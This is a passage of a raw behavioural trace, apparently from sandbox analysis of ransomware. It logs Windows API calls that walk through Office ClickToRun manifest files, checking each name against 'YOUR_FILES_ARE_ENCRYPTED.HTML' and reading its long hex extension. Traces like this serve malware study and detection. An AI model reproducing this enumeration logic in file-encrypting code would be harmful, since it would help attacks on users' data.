hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843453b4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x843453b4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadd88a12, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x410e, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.05ABD055F321C1F455A19FCEA61C49F0F03B7E9783890E5B8B5984881E3DBC56", cAlternateFileName="C2RMAN~1.05A")) returned 1 [0109.833] StrStrIW (lpFirst="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.05ABD055F321C1F455A19FCEA61C49F0F03B7E9783890E5B8B5984881E3DBC56", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.833] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.05ABD055F321C1F455A19FCEA61C49F0F03B7E9783890E5B8B5984881E3DBC56") returned 192 [0109.833] PathFindExtensionW (pszPath="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.05ABD055F321C1F455A19FCEA61C49F0F03B7E9783890E5B8B5984881E3DBC56") returned=".05ABD055F321C1F455A19FCEA61C49F0F03B7E9783890E5B8B5984881E3DBC56" [0109.833] lstrlenW (lpString=".05ABD055F321C1F455A19FCEA61C49F0F03B7E9783890E5B8B5984881E3DBC56") returned 65 [0109.833] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83460030, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x83460030, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xaddb469e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x2656, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.dcfmui.msi.16.en-us.xml.9C7C59AF708A7CF4E2811D636746B9151BFAB3F62A1639E894F634E643BBC829", cAlternateFileName="C2RMAN~1.9C7")) returned 1 [0109.833] StrStrIW (lpFirst="C2RManifest.dcfmui.msi.16.en-us.xml.9C7C59AF708A7CF4E2811D636746B9151BFAB3F62A1639E894F634E643BBC829", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.833] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.9C7C59AF708A7CF4E2811D636746B9151BFAB3F62A1639E894F634E643BBC829") returned 183 [0109.833] PathFindExtensionW (pszPath="C2RManifest.dcfmui.msi.16.en-us.xml.9C7C59AF708A7CF4E2811D636746B9151BFAB3F62A1639E894F634E643BBC829") returned=".9C7C59AF708A7CF4E2811D636746B9151BFAB3F62A1639E894F634E643BBC829" [0109.833] lstrlenW (lpString=".9C7C59AF708A7CF4E2811D636746B9151BFAB3F62A1639E894F634E643BBC829") returned 65 [0109.833] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83201564, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x83201564, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xade38a32, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3a132, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.590BAFD8023FB2C08B6388CB451778CBFB1EFA7ECF92692804B87C1E2BD8700D", cAlternateFileName="C2RMAN~1.590")) returned 1 [0109.833] StrStrIW (lpFirst="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.590BAFD8023FB2C08B6388CB451778CBFB1EFA7ECF92692804B87C1E2BD8700D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.833] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.590BAFD8023FB2C08B6388CB451778CBFB1EFA7ECF92692804B87C1E2BD8700D") returned 196 [0109.833] PathFindExtensionW (pszPath="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.590BAFD8023FB2C08B6388CB451778CBFB1EFA7ECF92692804B87C1E2BD8700D") returned=".590BAFD8023FB2C08B6388CB451778CBFB1EFA7ECF92692804B87C1E2BD8700D" [0109.833] lstrlenW (lpString=".590BAFD8023FB2C08B6388CB451778CBFB1EFA7ECF92692804B87C1E2BD8700D") returned 65 [0109.833] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830652d4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x830652d4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xade53dec, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x88d0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.excelmui.msi.16.en-us.xml.BC8D2D3D21CDF40A5B8E9B04479BA396EE5FDCA1DFE0EA74D8D66FE1FC4ED117", cAlternateFileName="C2RMAN~1.BC8")) returned 1 [0109.833] StrStrIW (lpFirst="C2RManifest.excelmui.msi.16.en-us.xml.BC8D2D3D21CDF40A5B8E9B04479BA396EE5FDCA1DFE0EA74D8D66FE1FC4ED117", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.833] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.BC8D2D3D21CDF40A5B8E9B04479BA396EE5FDCA1DFE0EA74D8D66FE1FC4ED117") returned 185 [0109.833] PathFindExtensionW (pszPath="C2RManifest.excelmui.msi.16.en-us.xml.BC8D2D3D21CDF40A5B8E9B04479BA396EE5FDCA1DFE0EA74D8D66FE1FC4ED117") returned=".BC8D2D3D21CDF40A5B8E9B04479BA396EE5FDCA1DFE0EA74D8D66FE1FC4ED117" [0109.833] lstrlenW (lpString=".BC8D2D3D21CDF40A5B8E9B04479BA396EE5FDCA1DFE0EA74D8D66FE1FC4ED117") returned 65 [0109.833] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830652d4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x830652d4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xade6919a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x8f06, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.91A660C1BA58544296520FA26C66C31679B68677A2BC88692825BAAEE991B55A", cAlternateFileName="C2RMAN~1.91A")) returned 1 [0109.833] StrStrIW (lpFirst="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.91A660C1BA58544296520FA26C66C31679B68677A2BC88692825BAAEE991B55A", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.834] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.91A660C1BA58544296520FA26C66C31679B68677A2BC88692825BAAEE991B55A") returned 198 [0109.834] PathFindExtensionW (pszPath="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.91A660C1BA58544296520FA26C66C31679B68677A2BC88692825BAAEE991B55A") returned=".91A660C1BA58544296520FA26C66C31679B68677A2BC88692825BAAEE991B55A" [0109.834] lstrlenW (lpString=".91A660C1BA58544296520FA26C66C31679B68677A2BC88692825BAAEE991B55A") returned 65 [0109.834] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830652d4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x830652d4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xade7c8e0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x17f6, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.groovemui.msi.16.en-us.xml.6989212DCCCACF940F0432BCD84F46751CC637BB1DC297FD8EF1CB7450CEAF58", cAlternateFileName="C2RMAN~1.698")) returned 1 [0109.834] StrStrIW (lpFirst="C2RManifest.groovemui.msi.16.en-us.xml.6989212DCCCACF940F0432BCD84F46751CC637BB1DC297FD8EF1CB7450CEAF58", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.834] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.6989212DCCCACF940F0432BCD84F46751CC637BB1DC297FD8EF1CB7450CEAF58") returned 186 [0109.834] PathFindExtensionW (pszPath="C2RManifest.groovemui.msi.16.en-us.xml.6989212DCCCACF940F0432BCD84F46751CC637BB1DC297FD8EF1CB7450CEAF58") returned=".6989212DCCCACF940F0432BCD84F46751CC637BB1DC297FD8EF1CB7450CEAF58" [0109.834] lstrlenW (lpString=".6989212DCCCACF940F0432BCD84F46751CC637BB1DC297FD8EF1CB7450CEAF58") returned 65 [0109.834] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830652d4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x830652d4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadf93221, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x15dd6, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.16F4E381E48D0162EE67461A5365EBAC257148C9DDB30EE640C0B7F823854914", cAlternateFileName="C2RMAN~1.16F")) returned 1 [0109.834] StrStrIW (lpFirst="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.16F4E381E48D0162EE67461A5365EBAC257148C9DDB30EE640C0B7F823854914", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.834] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.16F4E381E48D0162EE67461A5365EBAC257148C9DDB30EE640C0B7F823854914") returned 194 [0109.834] PathFindExtensionW (pszPath="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.16F4E381E48D0162EE67461A5365EBAC257148C9DDB30EE640C0B7F823854914") returned=".16F4E381E48D0162EE67461A5365EBAC257148C9DDB30EE640C0B7F823854914" [0109.834] lstrlenW (lpString=".16F4E381E48D0162EE67461A5365EBAC257148C9DDB30EE640C0B7F823854914") returned 65 [0109.834] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8303f160, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x8303f160, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadeb806e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x5b20, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.lyncmui.msi.16.en-us.xml.6C9C72A264DFE42351FF8BD45DC69B215DC711029D3433452F6C233C2943086B", cAlternateFileName="C2RMAN~1.6C9")) returned 1 [0109.834] StrStrIW (lpFirst="C2RManifest.lyncmui.msi.16.en-us.xml.6C9C72A264DFE42351FF8BD45DC69B215DC711029D3433452F6C233C2943086B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.834] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.6C9C72A264DFE42351FF8BD45DC69B215DC711029D3433452F6C233C2943086B") returned 184 [0109.834] PathFindExtensionW (pszPath="C2RManifest.lyncmui.msi.16.en-us.xml.6C9C72A264DFE42351FF8BD45DC69B215DC711029D3433452F6C233C2943086B") returned=".6C9C72A264DFE42351FF8BD45DC69B215DC711029D3433452F6C233C2943086B" [0109.834] lstrlenW (lpString=".6C9C72A264DFE42351FF8BD45DC69B215DC711029D3433452F6C233C2943086B") returned 65 [0109.834] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82fcc6db, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82fcc6db, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadede479, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x55c2, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.office64mui.msi.16.en-us.xml.4812F047BE1161911FAB8137A4DF6A32BF0AC27EC6FB41974189F0E250F0FD25", cAlternateFileName="C2RMAN~1.481")) returned 1 [0109.834] StrStrIW (lpFirst="C2RManifest.office64mui.msi.16.en-us.xml.4812F047BE1161911FAB8137A4DF6A32BF0AC27EC6FB41974189F0E250F0FD25", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.834] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64mui.msi.16.en-us.xml.4812F047BE1161911FAB8137A4DF6A32BF0AC27EC6FB41974189F0E250F0FD25") returned 188 [0109.834] PathFindExtensionW (pszPath="C2RManifest.office64mui.msi.16.en-us.xml.4812F047BE1161911FAB8137A4DF6A32BF0AC27EC6FB41974189F0E250F0FD25") returned=".4812F047BE1161911FAB8137A4DF6A32BF0AC27EC6FB41974189F0E250F0FD25" [0109.834] lstrlenW (lpString=".4812F047BE1161911FAB8137A4DF6A32BF0AC27EC6FB41974189F0E250F0FD25") returned 65 [0109.834] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82f706a3, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82f706a3, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadf059f1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.office64muiset.msi.16.en-us.xml.6476B1F5C9EC68FA29EC3041285CF19575A68249FA9581078AF2DFB6826AC864", cAlternateFileName="C2RMAN~1.647")) returned 1 [0109.835] StrStrIW (lpFirst="C2RManifest.office64muiset.msi.16.en-us.xml.6476B1F5C9EC68FA29EC3041285CF19575A68249FA9581078AF2DFB6826AC864", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.835] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64muiset.msi.16.en-us.xml.6476B1F5C9EC68FA29EC3041285CF19575A68249FA9581078AF2DFB6826AC864") returned 191 [0109.835] PathFindExtensionW (pszPath="C2RManifest.office64muiset.msi.16.en-us.xml.6476B1F5C9EC68FA29EC3041285CF19575A68249FA9581078AF2DFB6826AC864") returned=".6476B1F5C9EC68FA29EC3041285CF19575A68249FA9581078AF2DFB6826AC864" [0109.835] lstrlenW (lpString=".6476B1F5C9EC68FA29EC3041285CF19575A68249FA9581078AF2DFB6826AC864") returned 65 [0109.835] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e76fbe, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82e76fbe, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadf40616, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x414c2, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.office64ww.msi.16.x-none.xml.0D912E9F3B4B905333FA9C7A2B2595BD4015D2531E6002305BAE24A17276280E", cAlternateFileName="C2RMAN~1.0D9")) returned 1 [0109.835] StrStrIW (lpFirst="C2RManifest.office64ww.msi.16.x-none.xml.0D912E9F3B4B905333FA9C7A2B2595BD4015D2531E6002305BAE24A17276280E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.835] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64ww.msi.16.x-none.xml.0D912E9F3B4B905333FA9C7A2B2595BD4015D2531E6002305BAE24A17276280E") returned 188 [0109.835] PathFindExtensionW (pszPath="C2RManifest.office64ww.msi.16.x-none.xml.0D912E9F3B4B905333FA9C7A2B2595BD4015D2531E6002305BAE24A17276280E") returned=".0D912E9F3B4B905333FA9C7A2B2595BD4015D2531E6002305BAE24A17276280E" [0109.835] lstrlenW (lpString=".0D912E9F3B4B905333FA9C7A2B2595BD4015D2531E6002305BAE24A17276280E") returned 65 [0109.835] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d85586, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d85586, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadfbedd8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1a182, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.officemui.msi.16.en-us.xml.A745D989DD6E2FC25A95CA19F91AB5317830D83792361AB0A827B46A46020B39", cAlternateFileName="C2RMAN~1.A74")) returned 1 [0109.835] StrStrIW (lpFirst="C2RManifest.officemui.msi.16.en-us.xml.A745D989DD6E2FC25A95CA19F91AB5317830D83792361AB0A827B46A46020B39", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.835] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.A745D989DD6E2FC25A95CA19F91AB5317830D83792361AB0A827B46A46020B39") returned 186 [0109.835] PathFindExtensionW (pszPath="C2RManifest.officemui.msi.16.en-us.xml.A745D989DD6E2FC25A95CA19F91AB5317830D83792361AB0A827B46A46020B39") returned=".A745D989DD6E2FC25A95CA19F91AB5317830D83792361AB0A827B46A46020B39" [0109.835] lstrlenW (lpString=".A745D989DD6E2FC25A95CA19F91AB5317830D83792361AB0A827B46A46020B39") returned 65 [0109.835] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d73041, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d73041, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae0abd34, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.officemuiset.msi.16.en-us.xml.8D9A543B57F9B91D99262495D368E23F537BCF6F72A149400D163CC63DE67B4B", cAlternateFileName="C2RMAN~1.8D9")) returned 1 [0109.835] StrStrIW (lpFirst="C2RManifest.officemuiset.msi.16.en-us.xml.8D9A543B57F9B91D99262495D368E23F537BCF6F72A149400D163CC63DE67B4B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.835] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.8D9A543B57F9B91D99262495D368E23F537BCF6F72A149400D163CC63DE67B4B") returned 189 [0109.835] PathFindExtensionW (pszPath="C2RManifest.officemuiset.msi.16.en-us.xml.8D9A543B57F9B91D99262495D368E23F537BCF6F72A149400D163CC63DE67B4B") returned=".8D9A543B57F9B91D99262495D368E23F537BCF6F72A149400D163CC63DE67B4B" [0109.835] lstrlenW (lpString=".8D9A543B57F9B91D99262495D368E23F537BCF6F72A149400D163CC63DE67B4B") returned 65 [0109.835] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d6ced4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d6ced4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae0cf551, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x176c8, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.CA57FC1D02A891435E52E4B359361A0D9E02A777B7D8828F53EE9E6472155947", cAlternateFileName="C2RMAN~1.CA5")) returned 1 [0109.835] StrStrIW (lpFirst="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.CA57FC1D02A891435E52E4B359361A0D9E02A777B7D8828F53EE9E6472155947", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.835] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.CA57FC1D02A891435E52E4B359361A0D9E02A777B7D8828F53EE9E6472155947") returned 200 [0109.835] PathFindExtensionW (pszPath="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.CA57FC1D02A891435E52E4B359361A0D9E02A777B7D8828F53EE9E6472155947") returned=".CA57FC1D02A891435E52E4B359361A0D9E02A777B7D8828F53EE9E6472155947" [0109.836] lstrlenW (lpString=".CA57FC1D02A891435E52E4B359361A0D9E02A777B7D8828F53EE9E6472155947") returned 65 [0109.836] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d5e483, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d5e483, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae0dd564, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x4a1a, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.onenotemui.msi.16.en-us.xml.A8395FBA273611B3DBB7295AEE8B422CAE600BE98512484C65E089B79C19033C", cAlternateFileName="C2RMAN~1.A83")) returned 1 [0109.836] StrStrIW (lpFirst="C2RManifest.onenotemui.msi.16.en-us.xml.A8395FBA273611B3DBB7295AEE8B422CAE600BE98512484C65E089B79C19033C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.836] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.A8395FBA273611B3DBB7295AEE8B422CAE600BE98512484C65E089B79C19033C") returned 187 [0109.836] PathFindExtensionW (pszPath="C2RManifest.onenotemui.msi.16.en-us.xml.A8395FBA273611B3DBB7295AEE8B422CAE600BE98512484C65E089B79C19033C") returned=".A8395FBA273611B3DBB7295AEE8B422CAE600BE98512484C65E089B79C19033C" [0109.836] lstrlenW (lpString=".A8395FBA273611B3DBB7295AEE8B422CAE600BE98512484C65E089B79C19033C") returned 65 [0109.836] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d56dc4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d56dc4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae0f1c43, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.DE14A6F512E6B7D0661C204B0F85ACBB4C15376E9BA608B18D470D8772AE602D", cAlternateFileName="C2RMAN~1.DE1")) returned 1 [0109.836] StrStrIW (lpFirst="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.DE14A6F512E6B7D0661C204B0F85ACBB4C15376E9BA608B18D470D8772AE602D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.836] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.DE14A6F512E6B7D0661C204B0F85ACBB4C15376E9BA608B18D470D8772AE602D") returned 192 [0109.836] PathFindExtensionW (pszPath="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.DE14A6F512E6B7D0661C204B0F85ACBB4C15376E9BA608B18D470D8772AE602D") returned=".DE14A6F512E6B7D0661C204B0F85ACBB4C15376E9BA608B18D470D8772AE602D" [0109.836] lstrlenW (lpString=".DE14A6F512E6B7D0661C204B0F85ACBB4C15376E9BA608B18D470D8772AE602D") returned 65 [0109.836] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d54840, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d54840, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae1185f6, 